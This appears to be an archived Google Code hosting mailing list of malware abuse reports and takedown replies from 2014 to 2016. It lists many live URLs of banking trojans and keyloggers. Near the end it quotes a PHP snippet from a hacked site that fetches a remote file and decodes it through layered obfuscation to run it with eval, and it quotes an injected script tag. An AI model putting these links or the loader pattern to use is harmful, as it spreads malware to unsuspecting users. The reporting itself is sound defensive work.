[PL-391448] Malware files on your server: terocasunourocoe.storage.googleapis.com

2016-08-24 Thread PhishLabs Security Operations
Our company investigates computer crime incidents on behalf of banks and other companies. The following URL(s) are being used as part of a malware (computer virus) attack. hXXp://terocasunourocoe.storage.googleapis.com/nimahemibigusemarozonoda.soiduko?38scsfelbczg 216.58.194.48 - dfw25s12

[PL-391448] Malware files on your server: terocasunourocoe.storage.googleapis.com

2016-08-12 Thread PhishLabs Security Operations
Our company investigates computer crime incidents on behalf of banks and other companies. The following URL(s) are being used as part of a malware (computer virus) attack. hXXp://terocasunourocoe.storage.googleapis.com/nimahemibigusemarozonoda.soiduko?38scsfelbczg 216.58.218.208 - dfw06s47

[PL-291307] Malware files on your server: commondatastorage.googleapis.com/e1c6c8975/5903092a7e23db8

2016-02-03 Thread PhishLabs Security Operations
Our company investigates computer crime incidents on behalf of banks and other companies. The following URL(s) are being used as part of a malware (computer virus) attack. commondatastorage.googleapis.com/e1c6c8975/5903092a7e23db8 We request that all hacker files and malware files

Re: Malware Files needs removal

2015-06-08 Thread 'Mike Epstein' via Project Hosting on Google Code
Removed. On Mon, Jun 8, 2015 at 11:04 AM, Daniel M danie...@gmail.com wrote: Hello, we've received mails with a malware file linked to hosted in Google Code Hosting. The link is: https://curriculumanexo.googlecode.com/svn/Curriculum.rar Please can you remove it? Regards, Daniel

Malware Files needs removal

2015-06-08 Thread Daniel M
Hello, we've received mails with a malware file linked to hosted in Google Code Hosting. The link is: https://curriculumanexo.googlecode.com/svn/Curriculum.rar Please can you remove it? Regards, Daniel -- You received this message because you are subscribed to the Google Groups Project

Re: Critical Malware File hosted on googlecode.com (IP: 64.233.168.82 )

2015-06-03 Thread 'Mike Epstein' via Project Hosting on Google Code
Removed. On Wed, Jun 3, 2015 at 9:31 AM, Jairo Pinillos jpinil...@easysol.net wrote: Hello Team, My name is Jairo Pinillos, a security analyst from Easy Solutions, Inc. We recently found that you are hosting a malicious link which is being used to host a Malware File targeting one

Malware Files needs removal

2015-05-25 Thread FraudWatch Security
[Incident#ONJ-615137] Dear Web Host The FraudWatch International Security Operations Centre (www.fraudwatchinternational.com) has received a report of a fraudulent financial web page (illegal Malware download / data collection) hosted on your network. ** Please be aware that clicking any link

[PL-237061] Please suspend malware location.

2015-05-10 Thread PhishLabs Security Operations
Greetings, Our company investigates computer crime incidents on behalf of banks and other companies. The following URL(s) are being used as part of a malware (computer virus) attack targeting the users of Facebook Inc. http://storage.googleapis.com/tamamstd

[PL-236193] Malware files on your server: extradll.googlecode.com

2015-05-02 Thread soc
Our company investigates computer crime incidents on behalf of banks and other companies. The following URL(s) are being used as part of a malware (computer virus) attack. hXXp://extradll.googlecode.com/svn/schw4rz.txt 64.233.160.82 We kindly request your help to investigate and stop

[Incident#MXT-012497] Malware Site: https://cadastramentosnx.googlecode.com/svn/cadax/dake/wel/

2015-04-08 Thread FraudWatch Security
[Incident#MXT-012497] Dear Google Code Hosting The FraudWatch International Security Operations Centre (www.fraudwatchinternational.com) has received a report of a fraudulent financial web page (illegal Malware download / data collection) hosted on your network. ** Please be aware

[Incident#UAQ-426012] Malware Site: https://nota-fiscal-2015.googlecode.com/svn/NF-eN0008546526EXML7737257.rar

2015-03-18 Thread FraudWatch Security
[Incident#UAQ-426012] Dear Google Code Hosting The FraudWatch International Security Operations Centre (www.fraudwatchinternational.com) has received a report of a fraudulent financial web page (illegal Malware download / data collection) hosted on your network. ** Please be aware

BePush Malware Campaign Being Hosted via Multiple Google Code Projects

2015-03-10 Thread king
Please review the following Google Code projects hosting malicious .SCR files as part of the BePush Malware Family: https://code.google.com/p/dasdasd2342/ https://code.google.com/p/aminakoyimvale/ https://code.google.com/p/asciitohex/ https://code.google.com/p/asdsadsadsa/ https

Re: [PL-227215] Malware files on dasdasd2342.googlecode.com

2015-03-10 Thread 'Mike Epstein' via Project Hosting on Google Code
This has been taken down. On Mon, Mar 9, 2015 at 2:46 AM, s...@phishlabs.com wrote: Our company investigates computer crime incidents on behalf of banks and other companies. The following URL(s) are being used as part of a malware (computer virus) attack. hXXp dasdasd2342 [dot

[PL-227215] Malware files on dasdasd2342.googlecode.com

2015-03-10 Thread soc
Our company investigates computer crime incidents on behalf of banks and other companies. The following URL(s) are being used as part of a malware (computer virus) attack. hXXp dasdasd2342 [dot] googlecode [dot] com/svn/Horny_Video [dot] scr 173.194.64.82 - oa-in-f82.1e100.net We kindly

Re: Reporting abuse, and possible malware/phishing

2015-03-01 Thread 'Jason Hall' via Project Hosting on Google Code
://code.google.com/p/dashizer/source/browse/trunk/dashizer/index.html?r=3 Seems to have setup some sort of outdated project using my name. I'm not sure if this is a phishing, malware, or what sort of project it is, but I would like to have it deleted. -- You received this message because you

Reporting abuse, and possible malware/phishing

2015-03-01 Thread Zack Slone
User: ashishtechie23 https://code.google.com/p/dashizer/source/browse/trunk/dashizer/index.html?r=3 Seems to have setup some sort of outdated project using my name. I'm not sure if this is a phishing, malware, or what sort of project it is, but I would like to have it deleted. -- You

Re: Malware found at googleapis.com

2015-01-26 Thread 'Jason Hall' via Project Hosting on Google Code
Thanks for the report, I've forwarded this on to the Cloud Storage abuse team. On Mon, Jan 26, 2015 at 1:24 PM, Wagner De Queiroz wagnerdequei...@gmail.com wrote: http://storage.googleapis.com/sailizeira/ID1209149.zip are a malware named Zum.Androm.1 or Malware.QVM20.Gen https

malware http://sites.google.com/site/downl oadbrasil2014/Boleto_0014 7548_PDF.zip

2014-11-30 Thread Fraudwatch Security
http://sites.google.com/site/downl oadbrasil2014/Boleto_0014 7548_PDF.zip ** Malware Scan Report: https://www.virustotal.com/file/b05a27508377bc7196b14925c432d9de4c189a71fbfda46feac508582fe5c727/analysis/1417002408/ Please get rid of spaces on the URL to visit URL -- You received

Re: Malware detected on projects

2014-09-11 Thread CSIRT CEDIA
://killmalware.com/avocatstlemcen.com/ etc no single reference to a good use of these googlecode sites. El jueves, 21 de agosto de 2014 22:28:40 UTC-5, Joseph escribió: Malware detected on projects URL: https://vltkttth.googlecode.com/svn/wiki/VulanPro_12.rar Detection name: multiple threats

Re: Malware hosted on google code hosting

2014-09-11 Thread popydum1989
detectati eroarea miercuri, 27 august 2014, 05:39:27 UTC+3, Fraudwatch Security a scris: https://informesw.googlecode.com/svn/Boletim.zip See https://www.virustotal.com/file/870714c368e2b620370cf8a49883f319902220cd074d35bae194305be461/analysis/1405431354/ Can anyone remove this

Malware detected on projects

2014-09-10 Thread Mike Williams
Malware detected on projects URL: https://vautogame.googlecode.com/svn/wiki/Auto%20TTTH.rar Detection name: multiple threats,a variant of Win32/Packed.VMProtect.AAU trojan,Win32/Spy.SCKeyLog.O trojan -- You received this message because you are subscribed to the Google Groups Project

Re: Malware hosted on google code hosting

2014-08-27 Thread 'Augie Fackler' via Project Hosting on Google Code
Taken down, thanks. On Wed, Aug 27, 2014 at 4:39 AM, Fraudwatch Security fwi...@gmail.com wrote: https://informesw.googlecode.com/svn/Boletim.zip See https://www.virustotal.com/file/870714c368e2b620370cf8a49883f319902220cd074d35bae194305be461/analysis/1405431354/ Can anyone remove

Re: Malware detected on projects

2014-08-26 Thread 'Augie Fackler' via Project Hosting on Google Code
Taken down, thanks. On Thu, Aug 21, 2014 at 11:28 PM, Joseph bandieuhan...@gmail.com wrote: Malware detected on projects URL: https://vltkttth.googlecode.com/svn/wiki/VulanPro_12.rar Detection name: multiple threats,a variant of Win32/Packed.VMProtect.AAU trojan,Win32/Spy.SCKeyLog.O

Malware hosted on google code hosting

2014-08-26 Thread Fraudwatch Security
https://informesw.googlecode.com/svn/Boletim.zip See https://www.virustotal.com/file/870714c368e2b620370cf8a49883f319902220cd074d35bae194305be461/analysis/1405431354/ Can anyone remove this please? -- You received this message because you are subscribed to the Google Groups Project

Malware detected on http://wiki.parcela009.googlecode.com/hg/DOC21082014.zip

2014-08-22 Thread Fraudwatch Security
[Incident#CWV-628855] Dear Web Host The FraudWatch International Security Operations Centre (www.fraudwatchinternational.com) has received a report of a fraudulent financial web page (illegal malware download / data collection) hosted on your network. ** Please be aware that clicking any link

Malware detected on projects

2014-08-21 Thread Joseph
Malware detected on projects URL: https://vltkttth.googlecode.com/svn/tags/VulanPro_14.rar Detection name: multiple threats,a variant of Win32/Packed.VMProtect.AAU trojan,Win32/Spy.SCKeyLog.O trojan -- You received this message because you are subscribed to the Google Groups Project

Malware detected on projects

2014-08-21 Thread Joseph
Malware detected on projects URL: https://vltkttth.googlecode.com/svn/wiki/VulanPro_12.rar Detection name: multiple threats,a variant of Win32/Packed.VMProtect.AAU trojan,Win32/Spy.SCKeyLog.O trojan -- You received this message because you are subscribed to the Google Groups Project

Malware detected on projects

2014-08-10 Thread michael
Malware detected on projects URL: https://code.google.com/p/autogamettth/source/browse/#svn%2Ftrunk%253Fstate%253Dclosed URL: https://code.google.com/p/amardax/source/browse/#svn%253Fstate%253Dclosed URL: https://code.google.com/p/amardax/source/browse/#svn%2Ftrunk%253Fstate%253Dclosed

Malware detected on projects chobbb555, diangucvn

2014-08-07 Thread Michael
Malware detected on projects URL: https://ttthopen.googlecode.com/svn/trunk/Vulan%20Pro%201.1.rar Detection name: multiple threats,a variant of Win32/Packed.VMProtect.AAU trojan,Win32/Spy.SCKeyLog.O trojan -- You received this message because you are subscribed to the Google Groups Project

Re: JS Malware / Facebook Scam

2014-07-25 Thread 'Augie Fackler' via Project Hosting on Google Code
All taken down, many thanks for the report. On Fri, Jul 25, 2014 at 9:31 AM, Joey Fowler j...@tumblr.com wrote: Hi, The following three projects contain js-based malware that creates an iframe to redirect the user to a Facebook scam page: https://code.google.com/p/ancredirects/ https

Malware Site: https://notafiscalproduto94728.googlecode.com/svn/notafiscalproduto.pdf.zip

2014-07-16 Thread Fraudwatch Security
Hello, We have discovered some malware on your network and were hoping that you might be able to assist us in removing the content? IP Address: 74.125.28.82 URL: https://notafiscalproduto94728.googlecode.com/svn/notafiscalproduto.pdf.zip ** malware scan report https://www.virustotal.com/en

Re: Malware Site: https://notafiscalproduto94728.googlecode.com/svn/notafiscalproduto.pdf.zip

2014-07-16 Thread 'Augie Fackler' via Project Hosting on Google Code
Taken down, thanks. On Wed, Jul 16, 2014 at 3:40 AM, Fraudwatch Security fwi...@gmail.com wrote: Hello, We have discovered some malware on your network and were hoping that you might be able to assist us in removing the content? IP Address: 74.125.28.82 URL: https

Re: Malware detected on projects chobbb555, diangucvn

2014-07-08 Thread 'Mike Epstein' via Project Hosting on Google Code
Removed, thanks. On Tue, Jul 8, 2014 at 2:05 AM, Alex Lin jenryhuy...@gmail.com wrote: Malware detected on projects URL: https://severmodzvn.googlecode.com/files/ModzCrossFire.zip Detection name: multiple threats,a variant of Win32/Packed.VMProtect.AAU trojan,Win32/Spy.SCKeyLog.O trojan

Malware detected on projects chobbb555, diangucvn

2014-06-19 Thread Alex Lin
Malware detected on projects URL: https://code.google.com/p/severmodzvn/downloads/list Detection name: multiple threats,a variant of Win32/Packed.VMProtect.AAU trojan,Win32/Spy.SCKeyLog.O trojan Malware detected on projects https://code.google.com/p/modzvn/downloads/list Detection name

Malware detected on projects

2014-06-19 Thread Alex Lin
Project: onehitcf Malware detected on projects URL: https://code.google.com/p/severmodzvn/downloads/list Detection name: multiple threats,a variant of Win32/Packed.VMProtect.AAU trojan,Win32/Spy.SCKeyLog.O trojan Malware detected on projects https://code.google.com/p/modzvn/downloads/list

Re: malware on googlecode.com

2014-06-03 Thread 'Augie Fackler' via Project Hosting on Google Code
taken down, thanks On Mon, Jun 2, 2014 at 8:34 PM, Fraudwatch Security fwi...@gmail.com wrote: We have found malware on below URL https://dowload erfs .googlecode.com/svn/ Detalhes.zip please remove all spaces on the URL **malware scan report: https://www.virustotal.com/file

malware on googlecode.com

2014-06-02 Thread Fraudwatch Security
We have found malware on below URL https://dowload erfs .googlecode.com/svn/ Detalhes.zip please remove all spaces on the URL **malware scan report: https://www.virustotal.com/file/325d67b9c77151e103e04fb0153d76ee44f71f3fd47d5465eda38636621244de/analysis/1401419567/ Please remove binary

Malware detected on projects

2014-06-01 Thread Alex Lin
Malware detected on projects URL: https://dl.dropboxusercontent.com/u/81024891/TV.OOP.rar Detection name: multiple threats,a variant of Win32/Packed.VMProtect.AAU trojan,Win32/Spy.SCKeyLog.O trojan -- You received this message because you are subscribed to the Google Groups Project Hosting

Malware hosted on Google Code

2014-05-28 Thread Flavio Donadio
Hello! This project in Google Code is hosting malware: https://code.google.com/p/whattsappwindowsinstal/ Kind regards, Flavio -- You received this message because you are subscribed to the Google Groups Project Hosting on Google Code group. To unsubscribe from this group and stop

Re: Malware hosted on Google Code

2014-05-28 Thread 'Augie Fackler' via Project Hosting on Google Code
Taken down, thanks On Wed, May 21, 2014 at 11:49 AM, Flavio Donadio fla...@donadio.com.brwrote: Hello! This project in Google Code is hosting malware: https://code.google.com/p/whattsappwindowsinstal/ Kind regards, Flavio -- You received this message because you

Bank Malware

2014-05-28 Thread Jean D'Elboux Diogo
Hi, Could you remove Malware Project below, please? https://noticiaurgente.googlecode.com/svn/Anexo.zip Thanks -- Jean D'Elboux Diogo -- You received this message because you are subscribed to the Google Groups Project Hosting on Google Code group. To unsubscribe from this group and stop

Re: Bank Malware

2014-05-28 Thread 'Augie Fackler' via Project Hosting on Google Code
Done, thanks. On Wed, May 28, 2014 at 12:45 PM, Jean D'Elboux Diogo zi.je...@gmail.comwrote: Hi, Could you remove Malware Project below, please? https://noticiaurgente.googlecode.com/svn/Anexo.zip Thanks -- Jean D'Elboux Diogo -- You received this message because you are subscribed

Re: Malware detected on projects

2014-05-27 Thread 'Augie Fackler' via Project Hosting on Google Code
thanks, taken down On Mon, May 26, 2014 at 10:09 PM, jenryhuy...@gmail.com wrote: Malware detected on projects URL: https://code.google.com/p/applicationvolam2/source/browse/ Detection name: multiple threats,a variant of Win32/Packed.VMProtect.AAU trojan,Win32/Spy.SCKeyLog.O trojan

Malware detected on projects

2014-05-26 Thread jenryhuynh1
Malware detected on projects URL: https://code.google.com/p/applicationvolam2/source/browse/ Detection name: multiple threats,a variant of Win32/Packed.VMProtect.AAU trojan,Win32/Spy.SCKeyLog.O trojan -- You received this message because you are subscribed to the Google Groups Project

Malware Site: https://projeto-atualizacao-seguranca-2k14.googlecode.com/svn/cli1.zaz

2014-05-21 Thread Fraudwatch Security
[Incident#EJA-438092] Dear Web Host The FraudWatch International Security Operations Centre (www.fraudwatchinternational.com) has received a report of a fraudulent financial web page (illegal malware download / data collection) hosted on your network. ** Please be aware that clicking any link

Re: Malware detected on projects

2014-05-21 Thread 'Augie Fackler' via Project Hosting on Google Code
Thanks for the report. On Tue, May 20, 2014 at 11:40 PM, jenryhuy...@gmail.com wrote: Malware detected on projects URL: https://code.google.com/p/softwarevolam2/ Detection name: multiple threats,a variant of Win32/Packed.VMProtect.AAU trojan,Win32/Spy.SCKeyLog.O trojan Malware

Re: Malware Site: https://projeto-atualizacao-seguranca-2k14.googlecode.com/svn/cli1.zaz

2014-05-21 Thread 'Augie Fackler' via Project Hosting on Google Code
(illegal malware download / data collection) hosted on your network. ** Please be aware that clicking any link to an executable may harm your computer! We are providing these links to bring to your attention their existence so that you can take the appropriate action against this illegal activity

JS Malware / Facebook Scam

2014-05-19 Thread Joey Fowler
Hi, The following two projects contain js-based malware that creates an iframe to redirect the user to a Facebook scam page: https://code.google.com/p/roadsjs/ https://code.google.com/p/mytumproj/ If you need any additional information, please let me know. Thanks, Joey Fowler Security

Re: JS Malware / Facebook Scam

2014-05-19 Thread 'Augie Fackler' via Project Hosting on Google Code
taken down, thanks for the report! On Mon, May 12, 2014 at 9:42 AM, Joey Fowler j...@tumblr.com wrote: Hi, The following two projects contain js-based malware that creates an iframe to redirect the user to a Facebook scam page: https://code.google.com/p/roadsjs/ https://code.google.com/p

Re: Bank Malware

2014-05-16 Thread 'Jason Hall' via Project Hosting on Google Code
Taken down On Fri, May 16, 2014 at 2:31 PM, Jean D'Elboux Diogo zi.je...@gmail.comwrote: Hi guys, Another bank malware here: https://dlowadrgf.googlecode.com/svn/Detalhamento%20da%20Compra.zip Could you remove it, please? Thanks, Jean D'Elboux Diogo On Wed, May 14, 2014 at 11:07

Re: Bank Malware

2014-05-14 Thread 'Jason Hall' via Project Hosting on Google Code
Taken down, thanks. On Wed, May 14, 2014 at 9:58 AM, Jean D'Elboux Diogo zi.je...@gmail.comwrote: Could you remove Bank Malware below, please: https://dlowaderf.googlecode.com/svn/Detalhamento.zip -- Jean -- You received this message because you are subscribed to the Google Groups

Bank Malware Project

2014-05-08 Thread Jean D'Elboux Diogo
Project hosting bank malware here: https://dowloadrfe.googlecode.com/svn/Detalhamento%20da%20Compra.zip Please remove it. -- Jean D'Elboux Diogo -- You received this message because you are subscribed to the Google Groups Project Hosting on Google Code group. To unsubscribe from this group

Malware detected on projects

2014-05-07 Thread jenryhuynh
Malware detected on projects URL: https://volamhoiucmotthoi.googlecode.com/svn/VAutoJx.rar Detection name: multiple threats,a variant of Win32/Packed.VMProtect.AAU trojan,Win32/Spy.SCKeyLog.O trojan -- You received this message because you are subscribed to the Google Groups Project Hosting

Re: Malware detected on projects

2014-05-07 Thread 'Mike Williams' via Project Hosting on Google Code
Thanks for the report, the project has been banned On Wed, May 7, 2014 at 2:05 AM, jenryhu...@gmail.com wrote: Malware detected on projects URL: https://volamhoiucmotthoi.googlecode.com/svn/VAutoJx.rar Detection name: multiple threats,a variant of Win32/Packed.VMProtect.AAU trojan,Win32

Malware (harvesting likes on FB)

2014-05-06 Thread sharlinin
Hi, This http://art2tonic.googlecode.com/svn/code.txt is code pretending to reveal who is stalking your facebook profile, but it is actually harvesting likes for these pages: https://www.facebook.com/princesramadhanie.saiiankwiwhyeslaluuw

Re: Malware (harvesting likes on FB)

2014-05-06 Thread 'Mike Williams' via Project Hosting on Google Code
Thanks for the report, the project has been banned On Mon, May 5, 2014 at 1:09 AM, sharli...@gmail.com wrote: Hi, This http://art2tonic.googlecode.com/svn/code.txt is code pretending to reveal who is stalking your facebook profile, but it is actually harvesting likes for these pages:

Malware detected on projects chobbb555, diangucvn

2014-05-04 Thread jenryhuynh
Project: onehitcf Malware detected on projects URL: https://volamhoiucmotthoi.googlecode.com/svn/VAutoJx.rar Detection name: multiple threats,a variant of Win32/Packed.VMProtect.AAU trojan,Win32/Spy.SCKeyLog.O trojan -- You received this message because you are subscribed to the Google

Malware detected on projects chobbb555, diangucvn

2014-04-24 Thread jenryhuynh
Project: onehitcf Malware detected on projects URL: https://volamhoiucmotthoi.googlecode.com/svn/VAutoJx.rar Detection name: multiple threats,a variant of Win32/Packed.VMProtect.AAU trojan,Win32/Spy.SCKeyLog.O trojan Date Seen: 2013-11-03 -- You received this message because you

Malware detected on projects chobbb555, diangucvn

2014-04-21 Thread jenryhuynh
Project: onehitcf Malware detected on projects URL: http://volamhoiucmotthoi.googlecode.com/svn/VAutoJx.rar Detection name: multiple threats,a variant of Win32/Packed.VMProtect.AAU trojan,Win32/Spy.SCKeyLog.O trojan Date Seen: 2013-11-03 -- You received this message because you

Malware was detected on the following project.

2014-04-20 Thread cauchutra . info
Malware was detected on the following project. URL: http://volamhoiucmotthoi.googlecode.com/svn/VAutoJx.rar perfect keylogger detected Detection name: multiple threats,a variant of Win32/Packed.VMProtect.AAU trojan,Win32/Spy.SCKeyLog.O trojan -- You received this message because you

Malware on html5skinner.googlecode.com

2014-04-17 Thread IID Sirt
Team, Multiple malware URLs available at: http://html5skinner.googlecode.com/svn/trunk/ https://www.virustotal.com/en/file/0dabacbb1b6da01546c0d4525ea8258cff104641492d72fa0992fcad4e7d2478/analysis/ Please disable the malicious URLs and any related accounts. Thanks. Regards, IID SIRT

Re: Malware on html5skinner.googlecode.com

2014-04-17 Thread Mike Williams
Thanks for the report, I have banned the project On Thu, Apr 17, 2014 at 12:25 PM, IID Sirt iid.sharkpat...@gmail.comwrote: Team, Multiple malware URLs available at: http://html5skinner.googlecode.com/svn/trunk/ https://www.virustotal.com/en/file

Re: Abuse Report (Spreding malware over Facebook)

2014-04-17 Thread Mike Williams
Thanks for the report, I have banned the project On Wed, Apr 16, 2014 at 12:26 PM, zuva...@gmail.com wrote: Hello! It seems like user Kingcmd is spreding malware over (somehow) hacked facebook accounts. The googlecode Page is https://code.google.com/p/kingcmd/ The facebook-malware link

Redirect to a Malware file in googledrive.com (IP 173.194.46.11 - 173.194.46.12 - 173.194.46.10) (only seen through a Brazilian Proxy)

2014-04-15 Thread dmsagentes
Hello team, This is an official email from Easy Solutions. My name is Andres Uyaban, a security analyst engineer with Easy Solutions, Inc. You are hosting a malicius link that redirects to site that lets download a malware file. This is affecting some of our clients, which are banks located

Abuse Report - Malware - bunlarizukerler.googlecode.com

2014-04-05 Thread IID Sirt
http://bunlarizukerler.googlecode.com/svn/trunk/ FlashPlugin.exe https://www.virustotal.com/en/file/d9dbc8990ef5eb761b7e9b609c23a662db0aaf0ca82b462b5b17a688cad3951a/analysis/ Detection ratio: 24 / 51 Please disable this account and related accounts. Let us know if you have any questions.

Re: Abuse Report - Malware - bunlarizukerler.googlecode.com

2014-04-05 Thread Jason Hall
Taken down, thanks. On Sat, Apr 5, 2014 at 10:45 AM, IID Sirt iid.sharkpat...@gmail.com wrote: http://bunlarizukerler.googlecode.com/svn/trunk/ FlashPlugin.exe https://www.virustotal.com/en/file/d9dbc8990ef5eb761b7e9b609c23a662db0aaf0ca82b462b5b17a688cad3951a/analysis/ Detection ratio:

Malware was detected on the following project.

2014-04-03 Thread Mike Williams
Malware was detected on the following project. http://volam2-111.googlecode.com/svn/trunk/volam2.com perfect keylogger detected -- You received this message because you are subscribed to the Google Groups Project Hosting on Google Code group. To unsubscribe from this group and stop

Re: Malware URL hosted on googlecode.com (IP:74.125.30.82)

2014-04-01 Thread Omar Jarjur
Thanks for the report. On Thursday, March 27, 2014 2:18:24 PM UTC-7, es.dm...@gmail.com wrote: Good afternoon, My name is Anderson González, a security analyst with Easy Solutions, Inc. We recently found that you are hosting an URL used to host a malware file which is targeting one of our

Malware URL hosted on googlecode.com (IP:74.125.30.82)

2014-04-01 Thread es . dmsagent
Good afternoon, My name is Anderson González, a security analyst with Easy Solutions, Inc. We recently found that you are hosting an URL used to host a malware file which is targeting one of our clients, a bank in America, in the following URL(s): https://boletoo.googlecode.com/svn/Boleto.rar

Malware referencing Google Code

2014-04-01 Thread ricardo . escude
One of our clients website has been hacked, and in the HTML the hackers have left, there are references to Google's project hosting: script type=text/javascript src= http://blogedek-javascript.googlecode.com/files/efek-salju.js; //script Please remove the malware... -- You received

Re: Malware referencing Google Code

2014-04-01 Thread Omar Jarjur
-javascript.googlecode.com/files/efek-salju.js; //script Please remove the malware... -- You received this message because you are subscribed to the Google Groups Project Hosting on Google Code group. To unsubscribe from this group and stop receiving emails from it, send an email to google-code-hosting

Re: Malware at .googlecode.com

2014-03-17 Thread Augie Fackler
taken down, thanks On Fri, Mar 14, 2014 at 3:53 PM, brudona...@gmail.com wrote: Dear Administrators, We have received some user complaints with a link to a malware targeting Pagseguro´s custumers which is hosted by your servers. The link are below: http://documento.googlecode.com/svn

Bank Malware

2014-03-14 Thread Jean D'Elboux Diogo
Hi, Could you remove the bank malware below, please? https://code.google.com/p/documento/ Thanks, Jean -- You received this message because you are subscribed to the Google Groups Project Hosting on Google Code group. To unsubscribe from this group and stop receiving emails from it, send

Malware banks

2014-03-14 Thread Daniel Torres
https://code.google.com/u/105585037066447074482/ https://code.google.com/p/foto-0176/ https://code.google.com/p/fotos-camera/ https://code.google.com/p/fotos-documentos/ https://code.google.com/p/fotos-novas/ https://code.google.com/p/meus-documentos/

Malware at .googlecode.com

2014-03-14 Thread brudonatti
Dear Administrators, We have received some user complaints with a link to a malware targeting Pagseguro´s custumers which is hosted by your servers. The link are below: http://documento.googlecode.com/svn/Detalhamento.rar http://documento.googlecode.com/svn/Documento.rar UOL (http

Malware was detected on the following project.

2014-03-13 Thread Mike Williams
Malware was detected on the following project. https://tintuc-volam2.googlecode.com/svn/trunk/tintuc.com perfect keylogger detected -- You received this message because you are subscribed to the Google Groups Project Hosting on Google Code group. To unsubscribe from this group and stop

Re: Malware was detected on the following project.

2014-03-13 Thread Mike Williams
Thanks for the report On Thu, Mar 13, 2014 at 3:11 AM, Mike Williams autovolam1...@gmail.comwrote: Malware was detected on the following project. https://tintuc-volam2.googlecode.com/svn/trunk/tintuc.com perfect keylogger detected -- You received this message because you are subscribed

malware detected

2014-03-13 Thread 571337
Malware detected: https://code.google.com/p/wskop/ https://code.google.com/p/wskop/source/browse/ both file sond.exe and song.exe are malware (banker) -- You received this message because you are subscribed to the Google Groups Project Hosting on Google Code group. To unsubscribe from

Re: malware detected

2014-03-13 Thread Mike Williams
Thanks for the report On Thu, Mar 13, 2014 at 10:46 AM, 571...@gmail.com wrote: Malware detected: https://code.google.com/p/wskop/ https://code.google.com/p/wskop/source/browse/ both file sond.exe and song.exe are malware (banker) -- You received this message because you are subscribed

Abuse Report ( Malware )

2014-03-12 Thread brudonatti
Dear Administrator, I would like to report that the URL https://informacao.googlecode.com/svn/Informacoes da Compra.rar, is a virus could you please remove it. Att Bruna -- You received this message because you are subscribed to the Google Groups Project Hosting on Google Code group. To

Re: Abuse Report ( Malware )

2014-03-12 Thread Mike Williams
Thanks for the report On Tue, Mar 11, 2014 at 12:12 PM, brudona...@gmail.com wrote: Dear Administrator, I would like to report that the URL https://informacao.googlecode.com/svn/Informacoes da Compra.rar, is a virus could you please remove it. Att Bruna -- You received this message

Malware was detected on the following project.

2014-03-12 Thread Mike Williams
Malware was detected on the following project. https://au-to-v.googlecode.com/files/VoLamII.com perfect keylogger detected -- You received this message because you are subscribed to the Google Groups Project Hosting on Google Code group. To unsubscribe from this group and stop receiving

Re: Malware was detected on the following project.

2014-03-12 Thread Mike Williams
Thanks for the report On Wed, Mar 12, 2014 at 1:02 PM, Mike Williams autovolam1...@gmail.comwrote: Malware was detected on the following project. https://au-to-v.googlecode.com/files/VoLamII.com perfect keylogger detected -- You received this message because you are subscribed

Malware was detected on the following project.

2014-03-12 Thread Administrator
Malware was detected on the following project. https://au-to-v.googlecode.com/files/VoLamII.com perfect keylogger detected Malware was detected on the following project. https://volam2-zing-vn.googlecode.com/svn/trunk/VoLamII.com perfect keylogger detected Malware was detected

Re: Malware was detected on the following project.

2014-03-12 Thread Mike Williams
Thanks for the report On Wed, Mar 12, 2014 at 1:03 PM, Administrator amin.hotro.z...@gmail.comwrote: Malware was detected on the following project. https://au-to-v.googlecode.com/files/VoLamII.com perfect keylogger detected Malware was detected on the following project. https

Abuse Report - Malware

2014-03-11 Thread Fraudwatch Security
Malware Found: http://fotos-camera.googlecode.com/svn/FOTO-0176.zip -- You received this message because you are subscribed to the Google Groups Project Hosting on Google Code group. To unsubscribe from this group and stop receiving emails from it, send an email to google-code-hosting+unsubscr

Bank Malware on Google Code

2014-03-11 Thread Jean D'Elboux Diogo
Could you please remove malware project below: https://code.google.com/p/informacao/ Thanks, Jean -- You received this message because you are subscribed to the Google Groups Project Hosting on Google Code group. To unsubscribe from this group and stop receiving emails from it, send an email

Re: Bank Malware on Google Code

2014-03-11 Thread Mike Williams
Thanks for the report On Tue, Mar 11, 2014 at 1:58 PM, Jean D'Elboux Diogo zi.je...@gmail.comwrote: Could you please remove malware project below: https://code.google.com/p/informacao/ Thanks, Jean -- You received this message because you are subscribed to the Google Groups Project

Malware was detected on the following project.

2014-03-07 Thread Mike Williams
Malware was detected on the following project. https://au-to-v.googlecode.com/files/VoLamII.com perfect keylogger detected Malware was detected on the following project. https://volam2-zing-vn.googlecode.com/svn/trunk/VoLamII.com perfect keylogger detected Malware was detected

Banker Malware on Google Code

2014-03-06 Thread Fabio Mello
Guys, There is a malware (Banker Trojan) in Google Code: https://detalhe-debito.googlecode.com/svn/Detalhamento.rar It was spread by phishing messages over the internet. Please remove it, other samples already removed: https://dowloadc.googlecode.com/svn/Detalhamento%20da%20Compra.rar

Re: Banker Malware on Google Code

2014-03-06 Thread Augie Fackler
Done On Thu, Mar 6, 2014 at 1:44 PM, Fabio Mello fabio.me...@gmail.com wrote: Guys, There is a malware (Banker Trojan) in Google Code: https://detalhe-debito.googlecode.com/svn/Detalhamento.rar It was spread by phishing messages over the internet. Please remove it, other samples already

Takedown Request for Malware Site: https://drive.google.com/uc?id=0B7GL_v41VtxbeTJGMklNWGFEc1Uexport=download

2014-02-20 Thread Fraudwatch Security
Requesting a take down for the following URL's containing malware: IP Address: 74.125.224.160 URL: https://drive.google.com/uc?id=0B7GL_v41VtxbeTJGMklNWGFEc1Uexport=download Additional URL's: https://drive.google.com/uc?id=0B7GL_v41VtxbZEdwOEJ1MFhQd0Uexport=download http://drive.google.com/uc

Takedown Request for Malware Site

2014-02-20 Thread Fraudwatch Security
Requesting takedown for the following Malware site(s): IP Address: 74.125.224.170 URL: https://doc-08-bg-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nca08q79a4jdp42rq27qgmm30t679gma/139291920/00558100178077668181/*/0B7GL_v41VtxbZEdwOEJ1MFhQd0U?h

Malware

2014-02-18 Thread Misha Shomz
http://netcat.googlecode.com/files/new.txt Used to hack into cPanel. -- You received this message because you are subscribed to the Google Groups Project Hosting on Google Code group. To unsubscribe from this group and stop receiving emails from it, send an email to

Re: Malware

2014-02-18 Thread Misha Shomz
This is the code that runs it (of course, they use eval instead of echo): $in73ct = http://netcat.googlecode.com/files/new.txt;; $inj3ct = file_get_contents($in73ct); echo (gzinflate(str_rot13(base64_decode(str_rot13(gzinflate(base64_decode($inj3ct))); On Tuesday, February 18, 2014

Re: Malware

2014-02-18 Thread Augie Fackler
